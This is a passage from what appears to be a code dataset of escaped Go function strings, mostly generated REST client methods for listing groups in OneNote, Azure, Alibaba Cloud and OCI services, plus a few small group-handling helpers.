a.client.cfg.BasePath + \"/groups({group-id})/onenote/pages({onenotePage-id})/parentSection/parentNotebook/sectionGroups({sectionGroup-id})/sectionGroups\"\n\tlocalVarPath = strings.Replace(localVarPath, \"{\"+\"group-id\"+\"}\", _neturl.QueryEscape(fmt.Sprintf(\"%v\", groupId)), -1)\n\tlocalVarPath = strings.Replace(localVarPath, \"{\"+\"onenotePage-id\"+\"}\", _neturl.QueryEscape(fmt.Sprintf(\"%v\", onenotePageId)), -1)\n\tlocalVarPath = strings.Replace(localVarPath, \"{\"+\"sectionGroup-id\"+\"}\", _neturl.QueryEscape(fmt.Sprintf(\"%v\", sectionGroupId)), -1)\n\n\tlocalVarHeaderParams := make(map[string]string)\n\tlocalVarQueryParams := _neturl.Values{}\n\tlocalVarFormParams := _neturl.Values{}\n\n\tif localVarOptionals != nil && localVarOptionals.Top.IsSet() {\n\t\tlocalVarQueryParams.Add(\"$top\", parameterToString(localVarOptionals.Top.Value(), \"\"))\n\t}\n\tif localVarOptionals != nil && localVarOptionals.Skip.IsSet() {\n\t\tlocalVarQueryParams.Add(\"$skip\", parameterToString(localVarOptionals.Skip.Value(), \"\"))\n\t}\n\tif localVarOptionals != nil && localVarOptionals.Search.IsSet() {\n\t\tlocalVarQueryParams.Add(\"$search\", parameterToString(localVarOptionals.Search.Value(), \"\"))\n\t}\n\tif localVarOptionals != nil && localVarOptionals.Filter.IsSet() {\n\t\tlocalVarQueryParams.Add(\"$filter\", parameterToString(localVarOptionals.Filter.Value(), \"\"))\n\t}\n\tif localVarOptionals != nil && localVarOptionals.Count.IsSet() {\n\t\tlocalVarQueryParams.Add(\"$count\", parameterToString(localVarOptionals.Count.Value(), \"\"))\n\t}\n\tif localVarOptionals != nil && localVarOptionals.Orderby.IsSet() {\n\t\tlocalVarQueryParams.Add(\"$orderby\", parameterToString(localVarOptionals.Orderby.Value(), \"csv\"))\n\t}\n\tif localVarOptionals != nil && localVarOptionals.Select_.IsSet() {\n\t\tlocalVarQueryParams.Add(\"$select\", parameterToString(localVarOptionals.Select_.Value(), \"csv\"))\n\t}\n\tif localVarOptionals != nil && localVarOptionals.Expand.IsSet() {\n\t\tlocalVarQueryParams.Add(\"$expand\", parameterToString(localVarOptionals.Expand.Value(), \"csv\"))\n\t}\n\t// to determine the Content-Type header\n\tlocalVarHTTPContentTypes := []string{}\n\n\t// set Content-Type header\n\tlocalVarHTTPContentType := selectHeaderContentType(localVarHTTPContentTypes)\n\tif localVarHTTPContentType != \"\" {\n\t\tlocalVarHeaderParams[\"Content-Type\"] = localVarHTTPContentType\n\t}\n\n\t// to determine the Accept header\n\tlocalVarHTTPHeaderAccepts := []string{\"application/json\"}\n\n\t// set Accept header\n\tlocalVarHTTPHeaderAccept := selectHeaderAccept(localVarHTTPHeaderAccepts)\n\tif localVarHTTPHeaderAccept != \"\" {\n\t\tlocalVarHeaderParams[\"Accept\"] = localVarHTTPHeaderAccept\n\t}\n\tr, err := a.client.prepareRequest(ctx, localVarPath, localVarHTTPMethod, localVarPostBody, localVarHeaderParams, localVarQueryParams, localVarFormParams, localVarFormFileName, localVarFileName, localVarFileBytes)\n\tif err != nil {\n\t\treturn localVarReturnValue, nil, err\n\t}\n\n\tlocalVarHTTPResponse, err := a.client.callAPI(r)\n\tif err != nil || localVarHTTPResponse == nil {\n\t\treturn localVarReturnValue, localVarHTTPResponse, err\n\t}\n\n\tlocalVarBody, err := _ioutil.ReadAll(localVarHTTPResponse.Body)\n\tlocalVarHTTPResponse.Body.Close()\n\tif err != nil {\n\t\treturn localVarReturnValue, localVarHTTPResponse, err\n\t}\n\n\tif localVarHTTPResponse.StatusCode >= 300 {\n\t\tnewErr := GenericOpenAPIError{\n\t\t\tbody: localVarBody,\n\t\t\terror: localVarHTTPResponse.Status,\n\t\t}\n\t\tif localVarHTTPResponse.StatusCode == 200 {\n\t\t\tvar v CollectionOfSectionGroup\n\t\t\terr = a.client.decode(&v, localVarBody, localVarHTTPResponse.Header.Get(\"Content-Type\"))\n\t\t\tif err != nil {\n\t\t\t\tnewErr.error = err.Error()\n\t\t\t\treturn localVarReturnValue, localVarHTTPResponse, newErr\n\t\t\t}\n\t\t\tnewErr.model = v\n\t\t\treturn localVarReturnValue, localVarHTTPResponse, newErr\n\t\t}\n\t\tif localVarHTTPResponse.StatusCode == 0 {\n\t\t\tvar v OdataError\n\t\t\terr = a.client.decode(&v, localVarBody, localVarHTTPResponse.Header.Get(\"Content-Type\"))\n\t\t\tif err != nil {\n\t\t\t\tnewErr.error = err.Error()\n\t\t\t\treturn localVarReturnValue, localVarHTTPResponse, newErr\n\t\t\t}\n\t\t\tnewErr.model = v\n\t\t\treturn localVarReturnValue, localVarHTTPResponse, newErr\n\t\t}\n\t\treturn localVarReturnValue, localVarHTTPResponse, newErr\n\t}\n\n\terr = a.client.decode(&localVarReturnValue, localVarBody, localVarHTTPResponse.Header.Get(\"Content-Type\"))\n\tif err != nil {\n\t\tnewErr := GenericOpenAPIError{\n\t\t\tbody: localVarBody,\n\t\t\terror: err.Error(),\n\t\t}\n\t\treturn localVarReturnValue, localVarHTTPResponse, newErr\n\t}\n\n\treturn localVarReturnValue, localVarHTTPResponse, nil\n}", "func (a *HyperflexApiService) GetHyperflexInitiatorGroupList(ctx context.Context) ApiGetHyperflexInitiatorGroupListRequest {\n\treturn ApiGetHyperflexInitiatorGroupListRequest{\n\t\tApiService: a,\n\t\tctx: ctx,\n\t}\n}", "func NewUpdateBugfieldTemplateGroupNotFound() *UpdateBugfieldTemplateGroupNotFound {\n\treturn &UpdateBugfieldTemplateGroupNotFound{}\n}", "func NewUserGroupListBadRequest() *UserGroupListBadRequest {\n\treturn &UserGroupListBadRequest{}\n}", "func NewGetGroupBackupNotFound() *GetGroupBackupNotFound {\n\treturn &GetGroupBackupNotFound{}\n}", "func NewSingleAdminGetGroupNotFound() *SingleAdminGetGroupNotFound {\n\treturn &SingleAdminGetGroupNotFound{}\n}", "func NewAddEventLoopGroupNotFound() *AddEventLoopGroupNotFound {\n\treturn &AddEventLoopGroupNotFound{}\n}", "func (client *ClustersClient) listByResourceGroupCreateRequest(ctx context.Context, resourceGroupName string, options *ClustersClientListByResourceGroupOptions) (*policy.Request, error) {\n\turlPath := \"/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.DBforPostgreSQL/serverGroupsv2\"\n\turlPath = strings.ReplaceAll(urlPath, \"{subscriptionId}\", url.PathEscape(client.subscriptionID))\n\tif resourceGroupName == \"\" {\n\t\treturn nil, errors.New(\"parameter resourceGroupName cannot be empty\")\n\t}\n\turlPath = strings.ReplaceAll(urlPath, \"{resourceGroupName}\", url.PathEscape(resourceGroupName))\n\treq, err := runtime.NewRequest(ctx, http.MethodGet, runtime.JoinPaths(client.internal.Endpoint(), urlPath))\n\tif err != nil {\n\t\treturn nil, err\n\t}\n\treqQP := req.Raw().URL.Query()\n\treqQP.Set(\"api-version\", \"2022-11-08\")\n\treq.Raw().URL.RawQuery = reqQP.Encode()\n\treq.Raw().Header[\"Accept\"] = []string{\"application/json\"}\n\treturn req, nil\n}", "func findHostGroupMembership(d *defs, hgName string, hgrpOffset hostgroupOffset) {\n hostgroupNameExcl := fmt.Sprintf(\"!%v\",hgName)\n hgrpExist := false\n for idx, def := range *d {\n if def[\"hostgroup_name\"].ToString() == hgName {\n hgrpExist = true\n }\n if def.attrExist(\"hostgroup_members\"){\n if def[\"hostgroup_members\"].Has(hgName) && !hgrpOffset.hostgroupMembers.Has(idx){\n hgrpOffset.hostgroupMembers.Add(idx)\n findHostGroupMembership(d, idx, hgrpOffset)\n // I dont think you can exclude hostgroup in hostgroup object definition\n // this could be removed if the above is true 100%\n } else if def[\"hostgroup_members\"].Has(hostgroupNameExcl) && !hgrpOffset.hostgroupMembers.Has(idx){\n hgrpOffset.hostgroupMembersExcl.Add(idx)\n }\n }\n }\n if !hgrpExist {\n fmt.Println(\"warning, hostgroup does not exist\", hgName)\n }\n}", "func (o *PostVolumeGroupsListDefault) Code() int {\n\treturn o._statusCode\n}", "func NewListIssueGroupOfProjectVersionParams() *ListIssueGroupOfProjectVersionParams {\n\tvar (\n\t\tlimitDefault = int32(200)\n\t\tshowhiddenDefault = bool(false)\n\t\tshowremovedDefault = bool(false)\n\t\tshowshortfilenamesDefault = bool(false)\n\t\tshowsuppressedDefault = bool(false)\n\t\tstartDefault = int32(0)\n\t)\n\treturn &ListIssueGroupOfProjectVersionParams{\n\t\tLimit: &limitDefault,\n\t\tShowhidden: &showhiddenDefault,\n\t\tShowremoved: &showremovedDefault,\n\t\tShowshortfilenames: &showshortfilenamesDefault,\n\t\tShowsuppressed: &showsuppressedDefault,\n\t\tStart: &startDefault,\n\n\t\ttimeout: cr.DefaultTimeout,\n\t}\n}", "func NewGroup(ctx context.Context) *errGroup {\n\tnewCtx, cancel := context.WithCancel(ctx)\n\treturn &errGroup{\n\t\tctx: newCtx,\n\t\tcancel: cancel,\n\t}\n}", "func (m *AccessPackage) SetIncompatibleGroups(value []Groupable)() {\n m.incompatibleGroups = value\n}", "func (me *XsdGoPkgHasElem_DefaultResponseGroupssequenceTxsdOperationInformationOperationInformationschema_DefaultResponseGroups_TxsdOperationInformationSequenceDefaultResponseGroups_) Walk() (err error) {\n\tif fn := WalkHandlers.XsdGoPkgHasElem_DefaultResponseGroupssequenceTxsdOperationInformationOperationInformationschema_DefaultResponseGroups_TxsdOperationInformationSequenceDefaultResponseGroups_; me != nil {\n\t\tif fn != nil {\n\t\t\tif err = fn(me, true); xsdt.OnWalkError(&err, &WalkErrors, WalkContinueOnError, WalkOnError) {\n\t\t\t\treturn\n\t\t\t}\n\t\t}\n\t\tif err = me.DefaultResponseGroups.Walk(); xsdt.OnWalkError(&err, &WalkErrors, WalkContinueOnError, WalkOnError) {\n\t\t\treturn\n\t\t}\n\t\tif fn != nil {\n\t\t\tif err = fn(me, false); xsdt.OnWalkError(&err, &WalkErrors, WalkContinueOnError, WalkOnError) {\n\t\t\t\treturn\n\t\t\t}\n\t\t}\n\t}\n\treturn\n}", "func (client LabClient) ListByResourceGroupPreparer(ctx context.Context, resourceGroupName string, filter string, top *int32, orderBy string) (*http.Request, error) {\n\tpathParameters := map[string]interface{}{\n\t\t\"resourceGroupName\": autorest.Encode(\"path\", resourceGroupName),\n\t\t\"subscriptionId\": autorest.Encode(\"path\", client.SubscriptionID),\n\t}\n\n\tconst APIVersion = \"2015-05-21-preview\"\n\tqueryParameters := map[string]interface{}{\n\t\t\"api-version\": APIVersion,\n\t}\n\tif len(filter) > 0 {\n\t\tqueryParameters[\"$filter\"] = autorest.Encode(\"query\", filter)\n\t}\n\tif top != nil {\n\t\tqueryParameters[\"$top\"] = autorest.Encode(\"query\", *top)\n\t}\n\tif len(orderBy) > 0 {\n\t\tqueryParameters[\"$orderBy\"] = autorest.Encode(\"query\", orderBy)\n\t}\n\n\tpreparer := autorest.CreatePreparer(\n\t\tautorest.AsGet(),\n\t\tautorest.WithBaseURL(client.BaseURI),\n\t\tautorest.WithPathParameters(\"/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.DevTestLab/labs\", pathParameters),\n\t\tautorest.WithQueryParameters(queryParameters))\n\treturn preparer.Prepare((&http.Request{}).WithContext(ctx))\n}", "func NewGetUsergroupsGroupIDBadRequest() *GetUsergroupsGroupIDBadRequest {\n\treturn &GetUsergroupsGroupIDBadRequest{}\n}", "func (client *ContainerGroupsClient) listByResourceGroupCreateRequest(ctx context.Context, resourceGroupName string, options *ContainerGroupsClientListByResourceGroupOptions) (*policy.Request, error) {\n\turlPath := \"/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.ContainerInstance/containerGroups\"\n\tif client.subscriptionID == \"\" {\n\t\treturn nil, errors.New(\"parameter client.subscriptionID cannot be empty\")\n\t}\n\turlPath = strings.ReplaceAll(urlPath, \"{subscriptionId}\", url.PathEscape(client.subscriptionID))\n\tif resourceGroupName == \"\" {\n\t\treturn nil, errors.New(\"parameter resourceGroupName cannot be empty\")\n\t}\n\turlPath = strings.ReplaceAll(urlPath, \"{resourceGroupName}\", url.PathEscape(resourceGroupName))\n\treq, err := runtime.NewRequest(ctx, http.MethodGet, runtime.JoinPaths(client.internal.Endpoint(), urlPath))\n\tif err != nil {\n\t\treturn nil, err\n\t}\n\treqQP := req.Raw().URL.Query()\n\treqQP.Set(\"api-version\", \"2023-05-01\")\n\treq.Raw().URL.RawQuery = reqQP.Encode()\n\treq.Raw().Header[\"Accept\"] = []string{\"application/json\"}\n\treturn req, nil\n}", "func (client *Client) ListResourceGroupsWithOptions(request *ListResourceGroupsRequest, runtime *util.RuntimeOptions) (_result *ListResourceGroupsResponse, _err error) {\n\t_err = util.ValidateModel(request)\n\tif _err != nil {\n\t\treturn _result, _err\n\t}\n\tquery := map[string]interface{}{}\n\tif !tea.BoolValue(util.IsUnset(request.DisplayName)) {\n\t\tquery[\"DisplayName\"] = request.DisplayName\n\t}\n\n\tif !tea.BoolValue(util.IsUnset(request.IncludeTags)) {\n\t\tquery[\"IncludeTags\"] = request.IncludeTags\n\t}\n\n\tif !tea.BoolValue(util.IsUnset(request.Name)) {\n\t\tquery[\"Name\"] = request.Name\n\t}\n\n\tif !tea.BoolValue(util.IsUnset(request.PageNumber)) {\n\t\tquery[\"PageNumber\"] = request.PageNumber\n\t}\n\n\tif !tea.BoolValue(util.IsUnset(request.PageSize)) {\n\t\tquery[\"PageSize\"] = request.PageSize\n\t}\n\n\tif !tea.BoolValue(util.IsUnset(request.ResourceGroupId)) {\n\t\tquery[\"ResourceGroupId\"] = request.ResourceGroupId\n\t}\n\n\tif !tea.BoolValue(util.IsUnset(request.ResourceGroupIds)) {\n\t\tquery[\"ResourceGroupIds\"] = request.ResourceGroupIds\n\t}\n\n\tif !tea.BoolValue(util.IsUnset(request.Status)) {\n\t\tquery[\"Status\"] = request.Status\n\t}\n\n\tif !tea.BoolValue(util.IsUnset(request.Tag)) {\n\t\tquery[\"Tag\"] = request.Tag\n\t}\n\n\treq := &openapi.OpenApiRequest{\n\t\tQuery: openapiutil.Query(query),\n\t}\n\tparams := &openapi.Params{\n\t\tAction: tea.String(\"ListResourceGroups\"),\n\t\tVersion: tea.String(\"2020-03-31\"),\n\t\tProtocol: tea.String(\"HTTPS\"),\n\t\tPathname: tea.String(\"/\"),\n\t\tMethod: tea.String(\"POST\"),\n\t\tAuthType: tea.String(\"AK\"),\n\t\tStyle: tea.String(\"RPC\"),\n\t\tReqBodyType: tea.String(\"formData\"),\n\t\tBodyType: tea.String(\"json\"),\n\t}\n\t_result = &ListResourceGroupsResponse{}\n\t_body, _err := client.CallApi(params, req, runtime)\n\tif _err != nil {\n\t\treturn _result, _err\n\t}\n\t_err = tea.Convert(_body, &_result)\n\treturn _result, _err\n}", "func CreateDefaultGroup(db *gorp.DbMap, groupName string) error {\n\tquery := `SELECT id FROM \"group\" where name = $1`\n\tvar id int64\n\tif err := db.QueryRow(query, groupName).Scan(&id); err == sql.ErrNoRows {\n\t\tlog.Debug(\"CreateDefaultGroup> create %s group in DB\", groupName)\n\t\tquery = `INSERT INTO \"group\" (name) VALUES ($1)`\n\t\tif _, err := db.Exec(query, groupName); err != nil {\n\t\t\treturn err\n\t\t}\n\t}\n\treturn nil\n}", "func (l *GroupLookup) createOrSetInGroup(index int, key flux.GroupKey, value interface{}) {\n\t// If this index is at -1, then we are inserting a value with a smaller key\n\t// than every group and we need to create a new group to insert it at the\n\t// beginning.\n\tif index == -1 {\n\t\tl.groups = append(l.groups, nil)\n\t\tcopy(l.groups[1:], l.groups[:])\n\t\tl.groups[0] = l.newKeyGroup([]groupKeyListElement{\n\t\t\t{key: key, value: value},\n\t\t})\n\t\tl.lastIndex = 0\n\t\treturn\n\t}\n\n\tkg := l.groups[index]\n\n\t// Find the location where this should be inserted.\n\ti := kg.InsertAt(key)\n\n\t// If this should be inserted after the last element, do it and leave.\n\tif i == len(kg.elements) {\n\t\tkg.elements = append(kg.elements, groupKeyListElement{\n\t\t\tkey: key,\n\t\t\tvalue: value,\n\t\t})\n\t\treturn\n\t} else if kg.elements[i].key.Equal(key) {\n\t\t// If the entry already exists at this index, set the value.\n\t\tkg.set(i, value)\n\t\treturn\n\t}\n\n\t// We have to split this entry into two new elements. First, we start\n\t// by creating space for the new entry.\n\tl.groups = append(l.groups, nil)\n\tcopy(l.groups[index+2:], l.groups[index+1:])\n\t// Construct the new group entry and copy the end of the slice\n\t// into the new key group.\n\tl.groups[index+1] = func() *groupKeyList {\n\t\t// TODO(rockstar): A nice optimization here would be to prevent\n\t\t// the deleted items from being copied. However, this entire function\n\t\t// needs to be refactored to support that, as it's possible that *all*\n\t\t// the elements have been deleted, so no split is needed.\n\t\t// Moving currently deleted elements out of this key group, the deleted\n\t\t// count must be decremented.\n\t\tfor _, item := range kg.elements[i:] {\n\t\t\tif item.deleted {\n\t\t\t\tkg.deleted--\n\t\t\t}\n\t\t}\n\n\t\tentries := make([]groupKeyListElement, len(kg.elements[i:]))\n\t\tcopy(entries, kg.elements[i:])\n\n\t\treturn l.newKeyGroup(entries)\n\t}()\n\t// Use a slice on the key group elements to remove the extra elements.\n\t// Then append the new key group entry.\n\tkg.elements = kg.elements[:i:cap(kg.elements)]\n\tkg.elements = append(kg.elements, groupKeyListElement{\n\t\tkey: key,\n\t\tvalue: value,\n\t})\n}", "func (o *GetAllGroupsNotFound) WithPayload(payload *models.Error) *GetAllGroupsNotFound {\n\to.Payload = payload\n\treturn o\n}", "func (a *Client) PublicListReasonGroupsShort(params *PublicListReasonGroupsParams, authInfo runtime.ClientAuthInfoWriter) (*PublicListReasonGroupsOK, error) {\n\t// TODO: Validate the params before sending\n\tif params == nil {\n\t\tparams = NewPublicListReasonGroupsParams()\n\t}\n\n\tif params.Context == nil {\n\t\tparams.Context = context.Background()\n\t}\n\n\tif params.RetryPolicy != nil {\n\t\tparams.SetHTTPClientTransport(params.RetryPolicy)\n\t}\n\n\tresult, err := a.transport.Submit(&runtime.ClientOperation{\n\t\tID: \"publicListReasonGroups\",\n\t\tMethod: \"GET\",\n\t\tPathPattern: \"/reporting/v1/public/namespaces/{namespace}/reasonGroups\",\n\t\tProducesMediaTypes: []string{\"application/json\"},\n\t\tConsumesMediaTypes: []string{\"application/json\"},\n\t\tSchemes: []string{\"https\"},\n\t\tParams: params,\n\t\tReader: &PublicListReasonGroupsReader{formats: a.formats},\n\t\tAuthInfo: authInfo,\n\t\tContext: params.Context,\n\t\tClient: params.HTTPClient,\n\t})\n\tif err != nil {\n\t\treturn nil, err\n\t}\n\n\tswitch v := result.(type) {\n\n\tcase *PublicListReasonGroupsOK:\n\t\treturn v, nil\n\tcase *PublicListReasonGroupsInternalServerError:\n\t\treturn nil, v\n\n\tdefault:\n\t\treturn nil, fmt.Errorf(\"Unexpected Type %v\", reflect.TypeOf(v))\n\t}\n}", "func (client IdentityClient) listDynamicGroups(ctx context.Context, request common.OCIRequest, binaryReqBody *common.OCIReadSeekCloser, extraHeaders map[string]string) (common.OCIResponse, error) {\n\n\thttpRequest, err := request.HTTPRequest(http.MethodGet, \"/dynamicGroups\", binaryReqBody, extraHeaders)\n\tif err != nil {\n\t\treturn nil, err\n\t}\n\n\tvar response ListDynamicGroupsResponse\n\tvar httpResponse *http.Response\n\thttpResponse, err = client.Call(ctx, &httpRequest)\n\tdefer common.CloseBodyIfValid(httpResponse)\n\tresponse.RawResponse = httpResponse\n\tif err != nil {\n\t\treturn response, err\n\t}\n\n\terr = common.UnmarshalResponse(httpResponse, &response)\n\treturn response, err\n}", "func ListGroupPath() string {\n\treturn \"/api/group\"\n}", "func NewDeleteCIDGroupsDefault(code int) *DeleteCIDGroupsDefault {\n\treturn &DeleteCIDGroupsDefault{\n\t\t_statusCode: code,\n\t}\n}", "func (c *MockResourceGroupsClient) List(ctx context.Context, filter string) ([]resources.Group, error) {\n\tif filter != \"\" {\n\t\treturn nil, fmt.Errorf(\"unsupported non-empty filter: %s\", filter)\n\t}\n\tvar l []resources.Group\n\tfor _, rg := range c.RGs {\n\t\tl = append(l, rg)\n\t}\n\treturn l, nil\n}", "func (a *GroupsOnenoteNotebooksSectionGroupApiService) GroupsOnenoteNotebooksSectionGroupsListSections(ctx _context.Context, groupId string, notebookId string, sectionGroupId string, localVarOptionals *GroupsOnenoteNotebooksSectionGroupsListSectionsOpts) (CollectionOfOnenoteSection, *_nethttp.Response, error) {\n\tvar (\n\t\tlocalVarHTTPMethod = _nethttp.MethodGet\n\t\tlocalVarPostBody interface{}\n\t\tlocalVarFormFileName string\n\t\tlocalVarFileName string\n\t\tlocalVarFileBytes []byte\n\t\tlocalVarReturnValue CollectionOfOnenoteSection\n\t)\n\n\t// create path and map variables\n\tlocalVarPath := a.client.cfg.BasePath + \"/groups({group-id})/onenote/notebooks({notebook-id})/sectionGroups({sectionGroup-id})/sections\"\n\tlocalVarPath = strings.Replace(localVarPath, \"{\"+\"group-id\"+\"}\", _neturl.QueryEscape(fmt.Sprintf(\"%v\", groupId)), -1)\n\tlocalVarPath = strings.Replace(localVarPath, \"{\"+\"notebook-id\"+\"}\", _neturl.QueryEscape(fmt.Sprintf(\"%v\", notebookId)), -1)\n\tlocalVarPath = strings.Replace(localVarPath, \"{\"+\"sectionGroup-id\"+\"}\", _neturl.QueryEscape(fmt.Sprintf(\"%v\", sectionGroupId)), -1)\n\n\tlocalVarHeaderParams := make(map[string]string)\n\tlocalVarQueryParams := _neturl.Values{}\n\tlocalVarFormParams := _neturl.Values{}\n\n\tif localVarOptionals != nil && localVarOptionals.Top.IsSet() {\n\t\tlocalVarQueryParams.Add(\"$top\", parameterToString(localVarOptionals.Top.Value(), \"\"))\n\t}\n\tif localVarOptionals != nil && localVarOptionals.Skip.IsSet() {\n\t\tlocalVarQueryParams.Add(\"$skip\", parameterToString(localVarOptionals.Skip.Value(), \"\"))\n\t}\n\tif localVarOptionals != nil && localVarOptionals.Search.IsSet() {\n\t\tlocalVarQueryParams.Add(\"$search\", parameterToString(localVarOptionals.Search.Value(), \"\"))\n\t}\n\tif localVarOptionals != nil && localVarOptionals.Filter.IsSet() {\n\t\tlocalVarQueryParams.Add(\"$filter\", parameterToString(localVarOptionals.Filter.Value(), \"\"))\n\t}\n\tif localVarOptionals != nil && localVarOptionals.Count.IsSet() {\n\t\tlocalVarQueryParams.Add(\"$count\", parameterToString(localVarOptionals.Count.Value(), \"\"))\n\t}\n\tif localVarOptionals != nil && localVarOptionals.Orderby.IsSet() {\n\t\tlocalVarQueryParams.Add(\"$orderby\", parameterToString(localVarOptionals.Orderby.Value(), \"csv\"))\n\t}\n\tif localVarOptionals != nil && localVarOptionals.Select_.IsSet() {\n\t\tlocalVarQueryParams.Add(\"$select\", parameterToString(localVarOptionals.Select_.Value(), \"csv\"))\n\t}\n\tif localVarOptionals != nil && localVarOptionals.Expand.IsSet() {\n\t\tlocalVarQueryParams.Add(\"$expand\", parameterToString(localVarOptionals.Expand.Value(), \"csv\"))\n\t}\n\t// to determine the Content-Type header\n\tlocalVarHTTPContentTypes := []string{}\n\n\t// set Content-Type header\n\tlocalVarHTTPContentType := selectHeaderContentType(localVarHTTPContentTypes)\n\tif localVarHTTPContentType != \"\" {\n\t\tlocalVarHeaderParams[\"Content-Type\"] = localVarHTTPContentType\n\t}\n\n\t// to determine the Accept header\n\tlocalVarHTTPHeaderAccepts := []string{\"application/json\"}\n\n\t// set Accept header\n\tlocalVarHTTPHeaderAccept := selectHeaderAccept(localVarHTTPHeaderAccepts)\n\tif localVarHTTPHeaderAccept != \"\" {\n\t\tlocalVarHeaderParams[\"Accept\"] = localVarHTTPHeaderAccept\n\t}\n\tr, err := a.client.prepareRequest(ctx, localVarPath, localVarHTTPMethod, localVarPostBody, localVarHeaderParams, localVarQueryParams, localVarFormParams, localVarFormFileName, localVarFileName, localVarFileBytes)\n\tif err != nil {\n\t\treturn localVarReturnValue, nil, err\n\t}\n\n\tlocalVarHTTPResponse, err := a.client.callAPI(r)\n\tif err != nil || localVarHTTPResponse == nil {\n\t\treturn localVarReturnValue, localVarHTTPResponse, err\n\t}\n\n\tlocalVarBody, err := _ioutil.ReadAll(localVarHTTPResponse.Body)\n\tlocalVarHTTPResponse.Body.Close()\n\tif err != nil {\n\t\treturn localVarReturnValue, localVarHTTPResponse, err\n\t}\n\n\tif localVarHTTPResponse.StatusCode >= 300 {\n\t\tnewErr := GenericOpenAPIError{\n\t\t\tbody: localVarBody,\n\t\t\terror: localVarHTTPResponse.Status,\n\t\t}\n\t\tif localVarHTTPResponse.StatusCode == 200 {\n\t\t\tvar v CollectionOfOnenoteSection\n\t\t\terr = a.client.decode(&v, localVarBody, localVarHTTPResponse.Header.Get(\"Content-Type\"))\n\t\t\tif err != nil {\n\t\t\t\tnewErr.error = err.Error()\n\t\t\t\treturn localVarReturnValue, localVarHTTPResponse, newErr\n\t\t\t}\n\t\t\tnewErr.model = v\n\t\t\treturn localVarReturnValue, localVarHTTPResponse, newErr\n\t\t}\n\t\tif localVarHTTPResponse.StatusCode == 0 {\n\t\t\tvar v OdataError\n\t\t\terr = a.client.decode(&v, localVarBody, localVarHTTPResponse.Header.Get(\"Content-Type\"))\n\t\t\tif err != nil {\n\t\t\t\tnewErr.error = err.Error()\n\t\t\t\treturn localVarReturnValue, localVarHTTPResponse, newErr\n\t\t\t}\n\t\t\tnewErr.model = v\n\t\t\treturn localVarReturnValue, localVarHTTPResponse, newErr\n\t\t}\n\t\treturn localVarReturnValue, localVarHTTPResponse, newErr\n\t}\n\n\terr = a.client.decode(&localVarReturnValue, localVarBody, localVarHTTPResponse.Header.Get(\"Content-Type\"))\n\tif err != nil {\n\t\tnewErr := GenericOpenAPIError{\n\t\t\tbody: localVarBody,\n\t\t\terror: err.Error(),\n\t\t}\n\t\treturn localVarReturnValue, localVarHTTPResponse, newErr\n\t}\n\n\treturn localVarReturnValue, localVarHTTPResponse, nil\n}", "func CreateListServerGroupsResponse() (response *ListServerGroupsResponse) {\n\tresponse = &ListServerGroupsResponse{\n\t\tBaseResponse: &responses.BaseResponse{},\n\t}\n\treturn\n}", "func (a *GroupsOnenotePagesOnenoteSectionApiService) GroupsOnenotePagesParentSectionParentSectionGroupListSectionGroups(ctx _context.Context, groupId string, onenotePageId string, localVarOptionals *GroupsOnenotePagesParentSectionParentSectionGroupListSectionGroupsOpts) (CollectionOfSectionGroup, *_nethttp.Response, error) {\n\tvar (\n\t\tlocalVarHTTPMethod = _nethttp.MethodGet\n\t\tlocalVarPostBody interface{}\n\t\tlocalVarFormFileName string\n\t\tlocalVarFileName string\n\t\tlocalVarFileBytes []byte\n\t\tlocalVarReturnValue CollectionOfSectionGroup\n\t)\n\n\t// create path and map variables\n\tlocalVarPath := a.client.cfg.BasePath + \"/groups({group-id})/onenote/pages({onenotePage-id})/parentSection/parentSectionGroup/sectionGroups\"\n\tlocalVarPath = strings.Replace(localVarPath, \"{\"+\"group-id\"+\"}\", _neturl.QueryEscape(fmt.Sprintf(\"%v\", groupId)), -1)\n\tlocalVarPath = strings.Replace(localVarPath, \"{\"+\"onenotePage-id\"+\"}\", _neturl.QueryEscape(fmt.Sprintf(\"%v\", onenotePageId)), -1)\n\n\tlocalVarHeaderParams := make(map[string]string)\n\tlocalVarQueryParams := _neturl.Values{}\n\tlocalVarFormParams := _neturl.Values{}\n\n\tif localVarOptionals != nil && localVarOptionals.Top.IsSet() {\n\t\tlocalVarQueryParams.Add(\"$top\", parameterToString(localVarOptionals.Top.Value(), \"\"))\n\t}\n\tif localVarOptionals != nil && localVarOptionals.Skip.IsSet() {\n\t\tlocalVarQueryParams.Add(\"$skip\", parameterToString(localVarOptionals.Skip.Value(), \"\"))\n\t}\n\tif localVarOptionals != nil && localVarOptionals.Search.IsSet() {\n\t\tlocalVarQueryParams.Add(\"$search\", parameterToString(localVarOptionals.Search.Value(), \"\"))\n\t}\n\tif localVarOptionals != nil && localVarOptionals.Filter.IsSet() {\n\t\tlocalVarQueryParams.Add(\"$filter\", parameterToString(localVarOptionals.Filter.Value(), \"\"))\n\t}\n\tif localVarOptionals != nil && localVarOptionals.Count.IsSet() {\n\t\tlocalVarQueryParams.Add(\"$count\", parameterToString(localVarOptionals.Count.Value(), \"\"))\n\t}\n\tif localVarOptionals != nil && localVarOptionals.Orderby.IsSet() {\n\t\tlocalVarQueryParams.Add(\"$orderby\", parameterToString(localVarOptionals.Orderby.Value(), \"csv\"))\n\t}\n\tif localVarOptionals != nil && localVarOptionals.Select_.IsSet() {\n\t\tlocalVarQueryParams.Add(\"$select\", parameterToString(localVarOptionals.Select_.Value(), \"csv\"))\n\t}\n\tif localVarOptionals != nil && localVarOptionals.Expand.IsSet() {\n\t\tlocalVarQueryParams.Add(\"$expand\", parameterToString(localVarOptionals.Expand.Value(), \"csv\"))\n\t}\n\t// to determine the Content-Type header\n\tlocalVarHTTPContentTypes := []string{}\n\n\t// set Content-Type header\n\tlocalVarHTTPContentType := selectHeaderContentType(localVarHTTPContentTypes)\n\tif localVarHTTPContentType != \"\" {\n\t\tlocalVarHeaderParams[\"Content-Type\"] = localVarHTTPContentType\n\t}\n\n\t// to determine the Accept header\n\tlocalVarHTTPHeaderAccepts := []string{\"application/json\"}\n\n\t// set Accept header\n\tlocalVarHTTPHeaderAccept := selectHeaderAccept(localVarHTTPHeaderAccepts)\n\tif localVarHTTPHeaderAccept != \"\" {\n\t\tlocalVarHeaderParams[\"Accept\"] = localVarHTTPHeaderAccept\n\t}\n\tr, err := a.client.prepareRequest(ctx, localVarPath, localVarHTTPMethod, localVarPostBody, localVarHeaderParams, localVarQueryParams, localVarFormParams, localVarFormFileName, localVarFileName, localVarFileBytes)\n\tif err 